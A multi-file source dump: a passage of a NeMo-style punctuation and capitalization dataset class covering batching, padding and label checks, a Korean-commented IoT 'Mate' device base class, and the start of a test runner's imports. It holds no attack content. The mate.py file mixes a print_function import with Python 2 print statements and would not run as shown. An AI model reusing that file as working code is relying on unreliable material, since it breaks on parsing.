self.input_ids, self.subtokens_mask, self.punct_labels, self.capit_labels
)
if get_label_frequencies:
self.punct_label_frequencies = self._calculate_and_save_label_frequencies(self.punct_labels, 'punct')
self.capit_label_frequencies = self._calculate_and_save_label_frequencies(self.capit_labels, 'capit')
def _get_path_to_pkl_features(
self, text_file: Path, cache_dir: Optional[Union[str, os.PathLike]], max_seq_length: int, num_samples: int
) -> Path:
if cache_dir is None:
cache_dir = text_file.parent
else:
cache_dir = Path(cache_dir).expanduser()
vocab_size = getattr(self.tokenizer, "vocab_size", 0)
features_pkl = cache_dir / "cached.{}.{}.max_seq_length{}.vocab{}.{}.punctuation_capitalization.pkl".format(
text_file.stem,
self.tokenizer.name,
max_seq_length,
vocab_size,
f'num_samples{num_samples}' if num_samples > 0 else 'all_samples',
)
return features_pkl
@staticmethod
def _check_constructor_parameters(
text_file: Union[str, os.PathLike],
labels_file: Union[str, os.PathLike],
punct_label_ids: Optional[Dict[str, int]],
capit_label_ids: Optional[Dict[str, int]],
punct_label_vocab_file: Union[str, os.PathLike],
capit_label_vocab_file: Union[str, os.PathLike],
num_samples: int,
use_cache: bool,
number_of_batches_is_multiple_of: int,
) -> None:
if torch.distributed.is_initialized() and torch.distributed.get_world_size() > 1 and not use_cache:
raise ValueError(
f"If you already created process group and the world size is greater than 1, then `use_cache` "
f"parameter has to `True`. Only master process prepares features and if `use_cache=False`, then "
f"other processes will not be able to obtain features. Alternatively, you may set `use_cache=False` "
f"and set up data before spawning processes. Use `cache_dir` dataset directory with "
f"`text_file` and `labels_file` is read-only."
)
if not (os.path.exists(text_file) and os.path.exists(labels_file)):
raise FileNotFoundError(
f'{text_file} or {labels_file} not found. The data should be split into 2 files: text.txt and '
f'labels.txt. Each line of the text.txt file contains text sequences, where words are separated with '
f'spaces. The labels.txt file contains corresponding labels for each word in text.txt, the labels are '
f'separated with spaces. Each line of the files should follow the format:\n'
f' [WORD] [SPACE] [WORD] [SPACE] [WORD] (for text.txt) and '
f' [LABEL] [SPACE] [LABEL] [SPACE] [LABEL] (for labels.txt).'
)
if not str(text_file).endswith('.txt'):
raise ValueError(
f"Parameter `text_file` has to be path to a file with .txt extension, whereas `text_file={text_file}`"
)
if not str(labels_file).endswith('.txt'):
raise ValueError(
f"Parameter `labels_file` has to be path to a file with .txt extension, whereas "
f"`labels_file={labels_file}`"
)
if punct_label_ids is not None and punct_label_vocab_file is not None:
punct_label_vocab_file = Path(punct_label_vocab_file).expanduser()
file_punct_label_ids = load_label_ids(punct_label_vocab_file)
if file_punct_label_ids != punct_label_ids:
raise_not_equal_labels_error(
first_labels=punct_label_ids,
second_labels=file_punct_label_ids,
first_labels_desc='Punctuation labels passed to the `PunctuationCapitalizationDataset` '
'constructor in parameter `punct_label_ids`',
second_labels_desc=f'Punctuation labels loaded from file {punct_label_vocab_file} path to which '
f'is passed in parameter `punct_label_vocab_file`',
)
if capit_label_ids is not None and capit_label_vocab_file is not None:
capit_vocab_file = Path(capit_label_vocab_file).expanduser()
file_capit_label_ids = load_label_ids(capit_vocab_file)
if file_capit_label_ids != capit_label_ids:
raise_not_equal_labels_error(
first_labels=capit_label_ids,
second_labels=file_capit_label_ids,
first_labels_desc='Capitalization labels passed to the `PunctuationCapitalizationDataset` '
'constructor in parameter `capit_label_ids`',
second_labels_desc=f'Capitalization labels loaded from file {capit_label_vocab_file} path to '
f'which is passed in parameter `capit_label_vocab_file`',
)
if num_samples == 0:
raise ValueError(
f"Parameter `num_samples` has to be positive or negative whereas `num_samples={num_samples}`. "
f"Negative `num_samples` is for using all samples in a dataset."
)
if number_of_batches_is_multiple_of < 1 or not isinstance(number_of_batches_is_multiple_of, int):
raise ValueError(
f"Parameter `number_of_batches_is_multiple_of` has to be positive integer whereas "
f"{number_of_batches_is_multiple_of} is given."
)
def _check_label_ids_loaded_from_pkl(
self,
parameter_punct_label_ids: Dict[str, int],
parameter_capit_label_ids: Dict[str, int],
pkl_punct_label_ids: Any,
pkl_capit_label_ids: Any,
punct_label_vocab_file: Optional[Path],
capit_label_vocab_file: Optional[Path],
) -> None:
if not isinstance(pkl_punct_label_ids, dict):
raise ValueError(
f"Punctuation label ids loaded from features file {self.features_pkl} have wrong type "
f"{type(pkl_punct_label_ids)}"
)
if parameter_punct_label_ids is not None:
if parameter_punct_label_ids != pkl_punct_label_ids:
raise_not_equal_labels_error(
first_labels=parameter_punct_label_ids,
second_labels=pkl_punct_label_ids,
first_labels_desc="Punctuation labels passed in parameter `punct_label_ids`"
if punct_label_vocab_file is None
else f"Punctuation labels loaded from file {punct_label_vocab_file}",
second_labels_desc=f"Punctuation label ids loaded from features file {self.features_pkl}",
)
if not isinstance(pkl_capit_label_ids, dict):
raise ValueError(
f"Capitalization label ids loaded from features file {self.features_pkl} has wrong type "
f"{type(pkl_capit_label_ids)}"
)
if parameter_capit_label_ids is not None:
if parameter_capit_label_ids != pkl_capit_label_ids:
raise_not_equal_labels_error(
first_labels=parameter_capit_label_ids,
second_labels=pkl_capit_label_ids,
first_labels_desc="Capitalization labels passed in parameter `capit_label_ids`"
if capit_label_vocab_file is None
else f"Capitalization labels loaded from file {capit_label_vocab_file}",
second_labels_desc=f"Capitalization label ids loaded from features file {self.features_pkl}",
)
@staticmethod
def _check_label_ids_vs_unique_labels(
label_ids: Dict[str, int], unique_labels: Set[str], label_type: str, task: str, label_file: Path
) -> None:
if unique_labels - set(label_ids):
not_present_labels = list(unique_labels - set(label_ids))
raise ValueError(
f"{len(not_present_labels)} {task} labels found in {label_file} are not present in "
f"`{label_type}_label_ids`. Examples of unexpected labels from {label_file}: {not_present_labels[:3]}"
)
@staticmethod
def _read_dataset(
text_file: Path, labels_file: Path, num_samples: int
) -> Tuple[Tuple[str, ...], Tuple[str, ...], Tuple[str, ...], Set[str], Set[str]]:
with open(text_file, 'r') as f:
text_lines = f.readlines()
punct_unique_labels, capit_unique_labels = set(), set()
punct_labels_lines, capit_labels_lines = [], []
with labels_file.open() as f:
for i, line in enumerate(f):
pairs = line.split()
if not all([len(p) == 2 for p in pairs]):
raise ValueError(
f"Some label pairs are not pairs but have wrong length (!= 2) in line {i} in label file "
f"{labels_file}"
)
words = text_lines[i].split()
if len(pairs) != len(words):
raise ValueError(
f"In line {i} in text file {text_file} number of words {len(words)} is not equal to the "
f"number of labels {len(pairs)} in labels file {labels_file}."
)
punct_line, capit_line = zip(*pairs)
punct_labels_lines.append(punct_line)
capit_labels_lines.append(capit_line)
punct_unique_labels.update(punct_line)
capit_unique_labels.update(capit_line)
if len(punct_labels_lines) != len(text_lines):
raise ValueError(
f"Number of text lines {len(text_lines)} in text file {text_file} is not equal to the number of lines "
f"{len(punct_labels_lines)} in labels file {labels_file}."
)
dataset = list(zip(text_lines, punct_labels_lines, capit_labels_lines))
if len(dataset) == 0:
raise ValueError(f"Dataset loaded from files {text_file} and {labels_file} is empty.")
if num_samples > 0:
dataset = dataset[:num_samples]
text_lines, punct_labels_lines, capit_labels_lines = zip(*dataset)
return text_lines, punct_labels_lines, capit_labels_lines, punct_unique_labels, capit_unique_labels
@staticmethod
def calc_batch_seq_length(queries: List[np.ndarray], length_is_multiple_of: int) -> int:
return ceil(max([len(elem) for elem in queries]) / length_is_multiple_of) * length_is_multiple_of
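# E.g. for queries of lengths 5, 11 and 17 and length_is_multiple_of=8 the method
# returns ceil(17 / 8) * 8 = 24.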
def _adjust_number_of_batches(
self,
input_ids: List[np.ndarray],
batch_beginnings: List[int],
batch_sizes: List[int],
batch_seq_lengths: List[int],
) -> Tuple[List[int], List[int], List[int]]:
"""
If length of ``batch_sizes`` list is not divisible by ``self.number_of_batches_is_multiple_of``, then
one or several batches are split into parts until number of batches is divisible by
``self.number_of_batches_is_multiple_of``.
The method selects a batch and tries to slice smaller batches of 8 elements each from it. If
the batch cannot be sliced any further and there are still not enough batches, then the next batch from the
dataset is selected.
If slicing batches of size 8 is not enough, then batches of size 1 are created.
If dataset is too small to create enough batches, then a warning is shown.
Args:
input_ids: tokenized queries of the dataset. `input_ids` are expected to be sorted by length in ascending
order.
batch_beginnings: indices of first elements of batches created inside :meth:`_mark_up_batches` method.
Expected to be sorted in ascending order.
batch_sizes: sizes of batches created inside :meth:`_mark_up_batches` method.
batch_seq_lengths: lengths of elements in batch after padding created inside :meth:`_mark_up_batches`
method.
Returns:
batch_beginnings: a list of indices in ``input_ids`` of first samples of every batch
batch_sizes: a list of numbers of samples in batches
batch_seq_lengths: a list of sequence lengths after padding for every batch
"""
batch_beginnings, batch_sizes = batch_beginnings.copy(), batch_sizes.copy()
batch_seq_lengths = batch_seq_lengths.copy()
num_missing_batches = (
self.number_of_batches_is_multiple_of - len(batch_sizes) % self.number_of_batches_is_multiple_of
)
if num_missing_batches == 0:
return batch_beginnings, batch_sizes, batch_seq_lengths
if sum(batch_sizes) - len(batch_sizes) < num_missing_batches:
logging.warning(
f"Unable to achieve number of batches multiple of {self.number_of_batches_is_multiple_of} because "
f"dataset in files '{self.text_file}' and '{self.labels_file}' contains not enough queries "
f"({sum(batch_sizes)}) or queries in the dataset are too long. Dataset will have "
f"{len(batch_sizes)} batches instead. For validation or test dataset if multiple GPUs are used "
f"this will lead to distorted metrics because some batches will be processed several times. "
f"To fix this problem you may try to tweak (increase) parameter `tokens_in_batch`, though result is "
f"not guaranteed."
)
return batch_beginnings, batch_sizes, batch_seq_lengths
num_cut = 0
for ss in [8, 1]: # ss - split_size
old_num_batches = len(batch_sizes)
# Starting from the last batch because its size is likely not a multiple of 8. Thus the number of
# batches whose size is not a multiple of 8 can be reduced by 1.
original_batch_index = old_num_batches - 1
while original_batch_index >= 0 and num_cut < num_missing_batches:
bs, bb = batch_sizes[original_batch_index], batch_beginnings[original_batch_index]
rb = 0 # an index of sliced first element of sliced batch in original batch (relative beginning)
if rb < bs - ss:
while rb < bs - ss and num_cut < num_missing_batches:
batch_sizes.append(ss)
batch_beginnings.append(bb + rb)
batch_seq_lengths.append(
self.calc_batch_seq_length(input_ids[bb + rb : bb + rb + ss], length_is_multiple_of=8)
)
rb += ss
num_cut += 1
assert len(input_ids[bb + rb : bb + bs]) > 0
batch_sizes[original_batch_index] = bs - rb
batch_beginnings[original_batch_index] = bb + rb
batch_seq_lengths[original_batch_index] = self.calc_batch_seq_length(
input_ids[bb + rb : bb + bs], length_is_multiple_of=8
)
original_batch_index -= 1
# Keeping order of batches.
batch_beginnings, batch_sizes, batch_seq_lengths = map(
list, zip(*sorted(zip(batch_beginnings, batch_sizes, batch_seq_lengths), key=lambda x: x[0]))
)
assert len(batch_beginnings) % self.number_of_batches_is_multiple_of == 0
assert len(batch_sizes) % self.number_of_batches_is_multiple_of == 0
assert len(batch_seq_lengths) % self.number_of_batches_is_multiple_of == 0
return batch_beginnings, batch_sizes, batch_seq_lengths
def _mark_up_batches(self, input_ids: List[np.ndarray]) -> Tuple[List[int], List[int], List[int]]:
"""
        Computes the indices of first samples in batches, batch sizes, and sequence lengths for batches. ``input_ids``
        has to be sorted by the number of tokens in ascending order.
        Batches are marked up with respect to the following conditions:
- total number of tokens in batch including paddings is less or equal to ``self.tokens_in_batch``
- batch size is evenly divisible by 8 (except for the last batch)
- seq length (elements of the third returned object) is evenly divisible by 8
        If ``self.batch_mark_up_progress_queue`` is not None, then mark-up progress is reported via
        ``self.batch_mark_up_progress_queue``. Otherwise, a ``tqdm`` instance is created in this function.
Args:
input_ids: a list of 1D int32 arrays. Elements of ``input_ids`` have to be sorted by length in ascending
order
Returns:
batch_beginnings: a list of indices in ``input_ids`` of first samples of every batch
batch_sizes: a list of numbers of samples in batches
batch_seq_lengths: a list of sequence lengths after padding for every batch
"""
batch_beginnings, batch_sizes, batch_seq_lengths = [], [], []
current_max_length = 0
start = 0
if self.batch_mark_up_progress_queue is None:
inp_iterator = tqdm(enumerate(input_ids), total=len(input_ids), desc="Batch mark up", unit="query")
else:
inp_iterator = enumerate(input_ids)
progress_made = 0
for i, inp in inp_iterator:
current_max_length = max(current_max_length, ceil(len(inp) / 8) * 8)
if current_max_length * (i + 1 - start) > self.tokens_in_batch:
batch_size = (i - start) // 8 * 8
if batch_size == 0:
if i > start:
batch_size = i - start
logging.warning(
f"Could not create batch with multiple of 8 size. Probably, there is a too long sequence "
f"in the dataset or parameter `tokens_in_batch` is too small. Current length of sequences "
f"in batch is {current_max_length}. Batch size will be reduced to {batch_size}. "
f"tokens_in_batch={self.tokens_in_batch}. The batch includes sequences from "
f"{start} to {i - 1}."
)
else:
logging.warning(
f"Input sequence number {i - 1} is too long. Could not fit it into batch with "
f"{self.tokens_in_batch} tokens. Sequence number {i - 1} will not be added to batches."
)
start = i
current_max_length = ceil(len(inp) / 8) * 8
continue
seq_length = self.calc_batch_seq_length(input_ids[start : start + batch_size], length_is_multiple_of=8)
batch_beginnings.append(start)
batch_sizes.append(batch_size)
batch_seq_lengths.append(seq_length)
start += batch_size
current_max_length = self.calc_batch_seq_length(input_ids[start : i + 1], length_is_multiple_of=8)
if self.batch_mark_up_progress_queue is not None:
progress_made += 1
if progress_made >= BATCH_MARK_UP_PROGRESS_REPORT_PERIOD:
self.batch_mark_up_progress_queue.put(progress_made)
progress_made = 0
if start < len(input_ids):
seq_length = self.calc_batch_seq_length(input_ids[start:], length_is_multiple_of=8)
batch_beginnings.append(start)
batch_sizes.append(len(input_ids) - start)
batch_seq_lengths.append(seq_length)
if self.batch_mark_up_progress_queue is not None:
self.batch_mark_up_progress_queue.put(progress_made)
if len(batch_beginnings) % self.number_of_batches_is_multiple_of:
batch_beginnings, batch_sizes, batch_seq_lengths = self._adjust_number_of_batches(
input_ids, batch_beginnings, batch_sizes, batch_seq_lengths
)
assert sum(batch_sizes) == len(input_ids)
for i in range(len(batch_beginnings) - 1):
assert batch_beginnings[i] + batch_sizes[i] == batch_beginnings[i + 1]
assert batch_seq_lengths[i] >= max(
[len(inp) for inp in input_ids[batch_beginnings[i] : batch_beginnings[i] + batch_sizes[i]]]
)
return batch_beginnings, batch_sizes, batch_seq_lengths
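    # Illustrative sketch added for this write-up (not part of the original class): a minimal stand-alone
    # version of the greedy mark-up rule described in the docstring above. Sequence lengths are padded up
    # to a multiple of 8, and a batch is closed as soon as ``padded_length * batch_size`` would exceed the
    # token budget. The name and the simplified handling of over-long sequences are assumptions. Example:
    # with a 64-token budget, 12 sequences of 8 tokens give _mark_up_sketch([8] * 12, 64) == [(0, 8, 8), (8, 4, 8)].
    @staticmethod
    def _mark_up_sketch(lengths, tokens_in_batch):
        """Return (start, size, seq_length) triples; ``lengths`` must be sorted in ascending order."""
        from math import ceil

        def pad8(n):
            return ceil(n / 8) * 8

        batches, start, max_len = [], 0, 0
        for i, n in enumerate(lengths):
            max_len = max(max_len, pad8(n))
            if max_len * (i + 1 - start) > tokens_in_batch:
                size = (i - start) // 8 * 8 or (i - start)  # fall back to a batch size that is not a multiple of 8
                if size == 0:  # a single sequence which does not fit on its own; it starts the next batch
                    start, max_len = i, pad8(n)
                    continue
                batches.append((start, size, max(pad8(l) for l in lengths[start : start + size])))
                start += size
                max_len = max(pad8(l) for l in lengths[start : i + 1])
        if start < len(lengths):
            batches.append((start, len(lengths) - start, max(pad8(l) for l in lengths[start:])))
        return batches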
def _pack_into_batches(
self,
input_ids: List[np.ndarray],
subtokens_mask: List[np.ndarray],
punct_labels: List[np.ndarray],
capit_labels: List[np.ndarray],
) -> List[Dict[str, np.ndarray]]:
"""
        Shuffle input sequences, sort them by the number of tokens, pad them, and pack them into batches which
        satisfy the following conditions:
- total number of tokens in batch including paddings is less or equal to ``self.tokens_in_batch``
- batch size is evenly divisible by 8 (except for the last batch)
- seq length (elements of the third returned object) is evenly divisible by 8
Created batches are shuffled before returning.
If ``self.add_masks_and_segment_ids_to_batch`` is ``True``, then ``'segment_ids'``, ``'loss_mask'``, and
``'input_mask'`` are added to the batch.
        If ``self.batch_building_progress_queue`` is not ``None``, then padding progress is reported to
        ``self.batch_building_progress_queue``. Otherwise, a new ``tqdm`` instance is created in the
        :meth:`_pack_into_batches` method.
Args:
input_ids: a list of 1D int32 arrays which contain token ids of dataset source
            subtokens_mask: a list of 1D boolean arrays whose elements are ``True`` if the corresponding token is
                the first token in a word
punct_labels: a list of 1D int32 arrays which contain encoded punctuation labels
capit_labels: a list of 1D int32 arrays which contain encoded capitalization labels
Returns:
a list of batches. Each batch is a dictionary with items:
- ``'input_ids'``: a ``np.int32`` numpy array;
- ``'subtokens_mask'``: a boolean numpy array;
- ``'punct_labels'``: a ``np.int32`` numpy array;
- ``'capit_labels'``: a ``np.int32`` numpy array.
            If ``self.add_masks_and_segment_ids_to_batch`` is ``True``, then a batch also contains the items
- ``'segment_ids'``: a ``np.int8`` numpy array;
- ``'input_mask'``: a boolean numpy array;
- ``'loss_mask'``: a boolean numpy array.
The values of a batch dictionary are numpy arrays of identical shape.
"""
zipped = list(zip(input_ids, subtokens_mask, punct_labels, capit_labels))
self.batch_shuffling_random_state.shuffle(zipped)
input_ids, subtokens_mask, punct_labels, capit_labels = zip(*sorted(zipped, key=lambda x: x[0].shape[0]))
batch_beginnings, batch_sizes, batch_seq_lengths = self._mark_up_batches(input_ids)
batches = []
if self.batch_building_progress_queue is None:
inp_iterator = tqdm(
zip(batch_beginnings, batch_sizes, batch_seq_lengths),
total=len(batch_beginnings),
desc="Batch building",
unit="batch",
)
else:
            # In this case, we report the number of queries, not the number of batches.
inp_iterator = zip(batch_beginnings, batch_sizes, batch_seq_lengths)
progress_made = 0
for start, size, length in inp_iterator:
batch_input_ids = pad(input_ids[start : start + size], length, self.tokenizer.pad_id)
batch_subtokens_mask = pad(subtokens_mask[start : start + size], length, False)
batch = {
"input_ids": batch_input_ids,
"subtokens_mask": batch_subtokens_mask,
"punct_labels": pad(
punct_labels[start : start + size], length, self.punct_label_ids[self.pad_label]
).astype(np.int64),
"capit_labels": pad(
capit_labels[start : start + size], length, self.capit_label_ids[self.pad_label]
).astype(np.int64),
}
if self.add_masks_and_segment_ids_to_batch:
batch_segment_ids, batch_input_mask, batch_loss_mask = create_masks_and_segment_ids(
batch_input_ids,
batch_subtokens_mask,
self.tokenizer.pad_id,
self.tokenizer.cls_id,
self.tokenizer.sep_id,
self.ignore_start_end,
self.ignore_extra_tokens,
)
batch['segment_ids'] = batch_segment_ids
batch['input_mask'] = batch_input_mask
batch['loss_mask'] = batch_loss_mask
batches.append(batch)
if self.batch_building_progress_queue is not None:
progress_made += size
if progress_made >= BATCH_BUILDING_PROGRESS_REPORT_PERIOD:
self.batch_building_progress_queue.put(progress_made)
progress_made = 0
if self.batch_building_progress_queue is not None:
self.batch_building_progress_queue.put(progress_made)
self.batch_shuffling_random_state.shuffle(batches)
return batches
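    # Illustrative sketch added for this write-up (an assumption about behaviour, not this module's actual
    # ``pad`` helper): ``pad`` as used above right-pads each 1D array to a common ``length`` and stacks the
    # results into a single [Batch, Time] array. A minimal stand-alone equivalent could look like this.
    @staticmethod
    def _pad_sketch(sequences, length, pad_value):
        import numpy as np
        out = np.full((len(sequences), length), pad_value, dtype=sequences[0].dtype)
        for i, seq in enumerate(sequences):
            out[i, : len(seq)] = seq
        return out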
def repack_batches_with_shuffle(self) -> None:
"""A function for proper shuffling of a dataset. Pytorch data loader shuffing will only permute batches."""
logging.info("Shuffling training dataset")
self.batches = self._pack_into_batches(
self.input_ids, self.subtokens_mask, self.punct_labels, self.capit_labels
)
def _calculate_and_save_label_frequencies(self, all_labels: List[np.ndarray], name: str) -> Dict[str, float]:
"""Calculates and saves labels frequencies in :attr:`label_info_save_dir`."""
merged_labels = itertools.chain.from_iterable(all_labels)
if self.verbose:
logging.info('Three most popular labels')
self.label_info_save_dir.mkdir(parents=True, exist_ok=True)
_, label_frequencies, _ = get_label_stats(
merged_labels, str(self.label_info_save_dir / f'label_count_{name}.tsv')
)
return label_frequencies
def save_labels_and_get_file_paths(
self, punct_labels_file_name: str, capit_labels_file_name: str
) -> Tuple[Path, Path]:
"""
Saves label ids into files located in ``self.label_info_save_dir``. Saved label ids are usually used for
``.nemo`` checkpoint creation.
The signatures of this method and the signature of the method
:meth:`~nemo.collections.nlp.data.token_classification.BertPunctuationCapitalizationTarredDataset.save_labels_and_get_file_paths`
must be identical.
Args:
punct_labels_file_name (:obj:`str`): a name of a punctuation labels file
capit_labels_file_name (:obj:`str`): a name of a capitalization labels file
Returns:
:obj:`Tuple[pathlib.Path, pathlib.Path]`: a tuple containing:
- :obj:`pathlib.Path`: a path to the saved punctuation labels file
- :obj:`pathlib.Path`: a path to the saved capitalization labels file
"""
nemo_dir = self.label_info_save_dir / LABEL_ID_DIR_FOR_NEMO_CHECKPOINT
punct_labels_file = nemo_dir / punct_labels_file_name
capit_labels_file = nemo_dir / capit_labels_file_name
save_label_ids(self.punct_label_ids, punct_labels_file)
save_label_ids(self.capit_label_ids, capit_labels_file)
return punct_labels_file, capit_labels_file
def __len__(self) -> int:
if self.use_features:
return len(self.batches)
return len(self.input_ids)
def collate_fn(self, batches: List[Dict[str, np.ndarray]]) -> Dict[str, torch.Tensor]:
"""
        Returns the zeroth batch from the ``batches`` list passed for collating and casts ``'segment_ids'``,
        ``'punct_labels'``, and ``'capit_labels'`` to the types supported by
:class:`~nemo.collections.nlp.models.token_classification.punctuation_capitalization_model.PunctuationCapitalizationModel`.
All output tensors have shape ``[Batch, Time]``.
.. warning::
            The ``batch_size`` parameter of the PyTorch data loader and sampler has to be ``1``.
Args:
batches (:obj:`List[Dict[str, np.ndarray]]`): a list containing 1 batch passed for collating
Returns:
:obj:`Dict[str, torch.Tensor]`: a batch dictionary with following items (for detailed description of batch
items see method :meth:`__getitem__`):
- ``'input_ids'`` (:obj:`torch.Tensor`): :obj:`torch.int32` tensor,
- ``'subtokens_mask'`` (:obj:`torch.Tensor`): :obj:`torch.bool` tensor,
- ``'punct_labels'`` (:obj:`torch.Tensor`): :obj:`torch.int64` tensor,
- ``'capit_labels'`` (:obj:`torch.Tensor`): :obj:`torch.int64` tensor,
- ``'segment_ids'`` (:obj:`torch.Tensor`): :obj:`torch.int32` tensor,
- ``'input_mask'`` (:obj:`torch.Tensor`): :obj:`torch.bool` tensor,
- ``'loss_mask'`` (:obj:`torch.Tensor`): :obj:`torch.bool` tensor.
"""
batch = {k: torch.as_tensor(v) for k, v in batches[0].items()}
batch['segment_ids'] = batch['segment_ids'].int()
batch['punct_labels'] = batch['punct_labels'].long()
batch['capit_labels'] = batch['capit_labels'].long()
return batch
def __getitem__(self, idx: int) -> Dict[str, np.ndarray]:
"""
        Returns the batch with index ``idx``. The values of the batch dictionary are numpy arrays of identical shapes
        ``[Batch, Time]``. Labels are identical for all tokens in a word. For example, if
          - the word ``'Tokenization'`` is tokenized into tokens ``['token', 'ization']``,
          - it is followed by a comma,
        then the punctuation labels are ``[',', ',']`` and the capitalization labels are ``['U', 'U']`` (``'U'`` is the
        label for words which start with an upper case character).
Args:
idx: an index of returned batch
Returns:
:obj:`Dict[str, np.ndarray]`: a dictionary with items:
- ``'input_ids'`` (:obj:`numpy.ndarray`): :obj:`numpy.int32` array containing encoded tokens,
              - ``'subtokens_mask'`` (:obj:`numpy.ndarray`): :obj:`bool` array whose elements are ``True`` if they
                correspond to the first token in a word,
- ``'punct_labels'`` (:obj:`numpy.ndarray`): :obj:`numpy.int32` array containing encoded punctuation
labels,
- ``'capit_labels'`` (:obj:`numpy.ndarray`): :obj:`numpy.int32` array containing encoded capitalization
                labels,
              - ``'segment_ids'`` (:obj:`numpy.ndarray`): :obj:`numpy.int8` array filled with zeros (BERT token types
                in HuggingFace terminology) (if ``self.add_masks_and_segment_ids_to_batch`` is ``False``, then this
                item is missing),
              - ``'input_mask'`` (:obj:`numpy.ndarray`): :obj:`bool` array whose elements are ``True`` if the
                corresponding token is not a padding token (if ``self.add_masks_and_segment_ids_to_batch`` is
                ``False``, then this item is missing),
              - ``'loss_mask'`` (:obj:`numpy.ndarray`): :obj:`bool` array whose elements are ``True`` if the loss is
                computed for the corresponding token. See more in the description of the constructor parameters
                ``ignore_start_end`` and ``ignore_extra_tokens`` (if ``self.add_masks_and_segment_ids_to_batch`` is
                ``False``, then this item is missing).
"""
if self.use_features:
return self.batches[idx]
return {'input_ids': self.input_ids[idx], 'subtokens_mask': self.subtokens_mask[idx],
'punct_labels': self.punct_labels[idx], 'capit_labels': self.capit_labels[idx]}
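# Usage sketch added for this write-up (an assumption, not part of this module): because every item
# returned by ``__getitem__`` is already a full padded batch, the PyTorch data loader has to be created
# with ``batch_size=1`` and with this dataset's ``collate_fn``; otherwise batches of batches would be
# produced. ``dataset`` below stands for an instance of the dataset class defined above.
def _example_make_loader(dataset):
    import torch.utils.data
    return torch.utils.data.DataLoader(
        dataset,
        batch_size=1,  # each dataset item is already a padded batch
        collate_fn=dataset.collate_fn,  # picks the zeroth (only) batch and casts label dtypes
        shuffle=False,  # shuffling is done by repack_batches_with_shuffle()
    )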
|
mate.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 JiNong, Inc.
# All right reserved.
#
"""
Defines the base Mate.
"""
from __future__ import print_function
import time
import util
import logging
import logging.handlers
import traceback
from calibration import Calibrator
from threading import Thread
from mblock import MBlock, BlkType
from enum import Enum
from devtype import DevType
from datetime import datetime
from dinfo import DevInfo
class Mate(object):
"""
    Defines the basic form of a Mate.
"""
def __init__(self, option, devinfo, coupleid, logger=None):
"""
        Constructor of Mate. Takes option and devinfo as its main inputs.
        :param option: settings for operation, passed as a dictionary
        :param devinfo: IDs of the devices to handle, passed in dictionary form as shown below.
            `id` is the device ID, `dk` is a key used to identify the device, `dt` is the device type, and
            `children` describes sub-devices when the device has any.
            devinfo : [
                {"id" : "3", "dk" : "1", "dt": "nd", "children" : [
                    {"id" : "4", "dk" : "0", "dt": "sen"},
                    {"id" : "5", "dk" : "1", "dt": "sen"},
                    {"id" : "6", "dk" : "2", "dt": "act"},
                    {"id" : "7", "dk" : "3", "dt": "act/retractable/level0"}
                ]}
            ]
        :param coupleid: the couple ID.
        :param logger: logger for logging. If None, one is created internally.
"""
self._option = option
print "mate initialized. ", option
self._coupleid = coupleid
self._sleep = {"time": 3, "obs": 19, "noti": 19} if "sleep" not in option else option["sleep"]
self._devinfo = DevInfo(devinfo)
self._writecb = None
self._executing = False
self._connected = False
self._msgq = None
if "backup" in option and "prefix" in option["backup"]:
self._backup = True
else:
self._backup = False
if logger is None:
self._logger = util.getdefaultlogger()
else:
self._logger = logger
self._calibrator = Calibrator(option, self._logger)
def __repr__(self):
return "{}({},{})".format(self.__class__.__name__, str(self._option), str(self._devinfo))
def start(self, _writecb):
""" Mate가 시작할때 호출됨 """
self._executing = True
self._writecb = _writecb
return True
def stop(self):
""" Mate가 중지될때 호출됨 """
self._executing = False
return True
def connect(self):
self._connected = True
return True
def close(self):
self._connected = False
def getvalue(self, k, v):
"""
        Used to calculate a sensor value.
        Uses the Calibrator; if no calibration is configured, the raw value is returned.
"""
return self._calibrator.calculate(k, v)
def isexecuting(self):
""" Mate가 작동중인지를 확인함 """
return self._executing
def isconnected(self):
""" Mate가 연결되어 있는지를 확인함 """
return self._connected
def writeblk(self, blk):
""" 외부에서 데이터 전달을 위해 호출되는 메소드. """
# external callback
print "###message : ", blk.get()
def readmsg(self):
""" Mate가 메세지를 읽는 함수. 직접구현해야함. """
self._msgq = [MBlock(0, BlkType.NONE, None)]
def backup(self, blk):
fname = "backup/" + self._option["backup"]["prefix"] + "-" + datetime.now().strftime("%Y%d%m") + ".bak"
with open(fname, "a") as fp:
fp.write(blk.stringify() + "\n")
def writecb(self, blk):
self._writecb(blk)
# backup
if self._backup:
self.backup(blk)
def sendobs(self):
""" 관측치를 전송한다. writecb를 사용함. """
pass
def sendnoti(self):
""" 노티를 전송한다. writecb를 사용함. """
pass
def run(self):
print "mate run ... sleep : ", self._sleep["time"]
scnt = 0
while self.isexecuting():
try:
while self.isexecuting() == True and self.isconnected() == False:
if self.connect() == False:
self._logger.info("sleep 10 seconds and try to connect")
time.sleep(10)
else:
self._logger.info("reconnected!!")
if self.isexecuting() == False:
break
time.sleep(self._sleep["time"])
self.readmsg()
if scnt % self._sleep["obs"] == 0:
self.sendobs()
if scnt % self._sleep["noti"] == 0:
self.sendnoti()
scnt = scnt + 1
except Exception as ex:
self._logger.warn("There is an exception : " + str(ex))
self._logger.warn(str(traceback.format_exc()))
try:
self.close()
except:
pass
print "mate stop"
class ThreadMate(Mate):
def __init__(self, option, devinfo, coupleid, logger=None):
super(ThreadMate, self).__init__(option, devinfo, coupleid, logger)
self._logger.info("Mate Started.")
def start(self, _writecb):
"""
        Called when the Mate starts.
        :param _writecb: callback method of another mate
"""
super(ThreadMate, self).start(_writecb)
self._thd = Thread(target=self.run)
self._thd.start()
return True
def stop(self):
""" Mate가 중지될때 호출됨 """
super(ThreadMate, self).stop()
self._thd.join()
return True
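# Illustrative sketch added for this write-up (an assumption, not part of this module): a minimal Mate
# subclass only needs to implement readmsg()/sendobs()/sendnoti(); the base run() loop already handles
# reconnection and the observation/notification periods. The block type below mirrors the placeholder
# used in Mate.readmsg.
class EchoMate(ThreadMate):
    """Toy mate which queues a placeholder block and reports it as an observation."""
    def readmsg(self):
        # A real mate would read from a serial port, a socket, a vendor API, etc.
        self._msgq = [MBlock(0, BlkType.NONE, None)]

    def sendobs(self):
        # Forward the queued blocks to the coupled mate via the write callback.
        if self._msgq:
            for blk in self._msgq:
                self.writecb(blk)
            self._msgq = []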
if __name__ == "__main__":
    mate = ThreadMate({}, [], None)   # None stands in for the required couple id in this smoke test
    mate2 = Mate({}, [], None)
mate.start(mate2.writeblk)
print "mate started"
time.sleep(3)
mate.stop()
print "mate stopped"
|
runtests.py
|
#!/usr/bin/env python
from __future__ import print_function
import atexit
import base64
import os
import sys
import re
import gc
import heapq
